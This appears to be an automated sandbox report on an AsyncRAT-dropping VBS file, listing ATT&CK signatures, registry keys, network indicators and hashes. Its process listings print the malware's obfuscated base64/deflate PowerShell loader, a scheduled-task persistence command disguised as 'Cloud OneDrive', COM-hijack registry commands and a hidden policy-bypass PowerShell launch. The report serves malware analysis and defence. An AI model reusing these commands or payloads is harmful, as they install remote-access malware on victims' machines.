Analysis Overview
SHA256
da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4
Threat Level: Known bad
The file da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4.vbs was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
Checks computer location settings
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Modifies registry class
Uses Task Scheduler COM API
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-24 01:50
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-24 01:50
Reported
2024-09-24 01:52
Platform
win7-20240903-en
Max time kernel
117s
Max time network
117s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 2900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3052 wrote to memory of 2900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3052 wrote to memory of 2900 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2900 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2900 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2900 wrote to memory of 2744 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bwrdjyvaostknlmeqfzc = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $bwrdjyvaostknlmeqfzc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
Files
memory/2900-4-0x000007FEF559E000-0x000007FEF559F000-memory.dmp
memory/2900-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/2900-6-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2900-7-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp
memory/2900-9-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 0b93044317ff65e2608b99dc4f535ca4 |
| SHA1 | 41d40765841bddd5886e401dbf97bac58e0f01e3 |
| SHA256 | 5609f2002af644596858abbe5737dfc3c8583fd7d224668872da2077f729bf4d |
| SHA512 | a5bd31b9af39a851f1fad93c544b494bb021189ebd1c8c1b8f309f2d491eb86ddd17d14de16f4816dacc0e7e694971c384c480ee890dae0585fdbc3b455e6160 |
memory/2900-14-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp
memory/2900-15-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-24 01:50
Reported
2024-09-24 01:52
Platform
win10v2004-20240802-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\da6181e22c0c7230058044b36945666bd5cb6eef577eed273f217b166335e1b4.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bwrdjyvaostknlmeqfzc = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $bwrdjyvaostknlmeqfzc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f
C:\Windows\system32\cmd.exe
cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"
C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www1.coulmandental.com | udp |
| US | 34.192.83.212:443 | www1.coulmandental.com | tcp |
| US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 88.119.175.153:7707 | tcp | |
| US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp |
| US | 88.119.175.153:8808 | tcp |
Files
memory/4716-0-0x00007FFA57D63000-0x00007FFA57D65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5b3qzqi0.heq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4716-7-0x000001EDE0460000-0x000001EDE0482000-memory.dmp
memory/4716-11-0x00007FFA57D60000-0x00007FFA58821000-memory.dmp
memory/4716-12-0x00007FFA57D60000-0x00007FFA58821000-memory.dmp
memory/4716-22-0x00007FFA57D63000-0x00007FFA57D65000-memory.dmp
memory/4716-23-0x00007FFA57D60000-0x00007FFA58821000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8d089c855358969266a3275f0ec4f955 |
| SHA1 | 5ce30b598cfa0c2008541b1b549673401971dc3d |
| SHA256 | e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734 |
| SHA512 | f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320 |
memory/4716-32-0x00007FFA57D60000-0x00007FFA58821000-memory.dmp
C:\ProgramData\Cloud\cloud.vbs
| MD5 | 7079642a22a106d0ed6f227cc70899ae |
| SHA1 | 60dd57af3518c0ea4104379ad233b5982b231283 |
| SHA256 | b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724 |
| SHA512 | ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80 |
C:\ProgramData\Cloud\cloud.bat
| MD5 | b8bdfc7895feaaacba3711d17be6778a |
| SHA1 | fa0bc12827b348fe540a13683897deb207650df7 |
| SHA256 | e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3 |
